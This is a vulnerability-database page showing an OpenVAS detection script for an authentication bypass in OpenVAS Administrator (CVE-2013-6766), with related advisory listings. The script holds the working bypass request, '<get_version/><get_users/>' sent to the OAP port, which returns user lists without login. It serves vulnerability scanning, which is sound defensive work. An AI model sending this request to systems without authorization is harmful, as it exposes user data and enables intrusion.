OpenVAS Administrator Authentication Bypass Vulnerability (OVSA20131108)
🗓️ 08 Nov 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType
openvas🔗 plugins.openvas.org👁 24 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2013-6766 | 19 May 201414:00 | – | cve | |
| CVE-2013-6766 | 19 May 201414:00 | – | cvelist | |
| EUVD-2013-6568 | 7 Oct 202500:30 | – | euvd | |
| CVE-2013-6766 | 19 May 201414:55 | – | nvd | |
| OpenVAS Administrator / Manager Authentication Bypass | 15 Nov 201300:00 | – | nessus | |
| Authentication flaw | 19 May 201414:55 | – | prion | |
| [OVSA20131108] OpenVAS Manager And OpenVAS Administrator Vulnerable To Partial Authentication Bypass | 9 Dec 201300:00 | – | securityvulns | |
| OpenVAS Manager / OpenVAS Administrator authentication bypass | 9 Dec 201300:00 | – | securityvulns | |
| CVE-2013-6766 | 19 May 201414:55 | – | ubuntucve |
| Source | Link |
|---|---|
| openvas | www.openvas.org/OVSA20131108.html |
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:openvas:openvas_administrator";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103828");
script_version("2023-06-23T16:09:17+0000");
script_cve_id("CVE-2013-6766");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2023-06-23 16:09:17 +0000 (Fri, 23 Jun 2023)");
script_tag(name:"creation_date", value:"2013-11-08 13:03:55 +0200 (Fri, 08 Nov 2013)");
script_name("OpenVAS Administrator Authentication Bypass Vulnerability (OVSA20131108)");
script_category(ACT_GATHER_INFO);
script_family("General");
script_copyright("Copyright (C) 2013 Greenbone AG");
script_dependencies("gb_openvas_administrator_detect.nasl", "gb_greenbone_os_consolidation.nasl");
script_require_ports("Services/oap", 9393);
script_mandatory_keys("openvas_administrator/detected");
script_exclude_keys("greenbone/gos/detected");
script_xref(name:"URL", value:"http://openvas.org/OVSA20131108.html");
script_tag(name:"impact", value:"Attackers can exploit these issues to gain unauthorized access to the
affected application and perform certain actions.");
script_tag(name:"vuldetect", value:"Try to bypass OAP authentication by sending a special crafted request.");
script_tag(name:"insight", value:"A software bug in the server module 'OpenVAS Administrator' allowed to bypass the OAP
authentication procedure. The attack vector is remotely available in case public OAP is enabled.
In case of successful attack, the attacker gains partial rights to execute OAP commands.");
script_tag(name:"solution", value:"Update to version 1.2.2 or 1.3.2.");
script_tag(name:"summary", value:"The remote OpenVAS Administrator is prone to an authentication bypass.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_vul");
exit(0);
}
include("host_details.inc");
if( get_kb_item( "greenbone/gos/detected" ) )
exit( 0 ); # there is an extra VT gb_gsm_manager_auth_bypass_11_13.nasl for the GSM
if( ! port = get_app_port( cpe:CPE ) )
exit( 0 );
if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
exit( 0 );
soc = open_sock_tcp( port );
if( ! soc )
exit( 0 );
req = "<get_version/><get_users/>";
send( socket:soc, data:req + '\r\n' );
res = recv( socket:soc, length:1024 );
close( soc );
if( "get_users_response status" >< res && "<user>" >< res ) {
report = 'By sending the request "' + req + '" to the remote OAP service it was possible to bypass the authentication. Response:\n\n' + res;
security_message( port:port, data:report );
exit( 0 );
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jun 2023 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 27.5
EPSS0.01628